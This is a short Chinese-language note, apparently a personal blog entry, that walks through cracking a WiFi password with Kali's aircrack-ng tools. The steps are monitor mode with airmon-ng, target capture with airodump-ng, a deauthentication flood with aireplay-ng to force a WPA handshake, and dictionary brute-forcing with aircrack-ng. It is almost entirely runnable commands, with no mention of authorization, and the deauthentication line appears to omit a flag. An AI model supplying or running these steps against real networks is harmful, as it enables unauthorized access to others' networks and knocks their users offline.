使用 Kali 破解 Wifi 密码

简单记录一下使用 Kali 自带的工具破解 WIFI 密码。

airmon-ng start wlan0

（关闭网卡监听模式）

airmon-ng stop wlan0

ifconfig		//wlan0后有mon即为开启成功，此时网卡处于监听模式

airodump-ng wlan0mon		//扫描结束后ctrl+c结束进程

BSSID 为 wifi 的 MAC 地址

PWR 为信号强弱程度，数值越小信号越强

DATA 为数据量，越大使用的人就越多

CH 为信道频率（频道）

ESSID 为 wifi 的名称

airodump-ng --bssid BSSID -c CH -w 抓包存储的路径 wlan0mon

//BSSID 为 wifi 的 MAC 地址 //CH 为信道频率 //路径后要加文件名

在扫描 wifi 的同时新建一个终端：

aireplay-ng -0 0 STATION -a BSSID wlan0mon

//STATION 为连接 wifi 的设备 MAC 地址 //BSSID 为 wifi 的 MAC 地址

当扫描 wifi 的界面出现 WPA handshake 时表示抓包成功，这时停止扫描和发送数据

将密码字典和抓到的包放到同一目录便于操作，主要使用抓到的握手包（cap 包）解码

aircrack-ng -w 密码字典路径 握手包路径

顺利的话即可爆破出密码。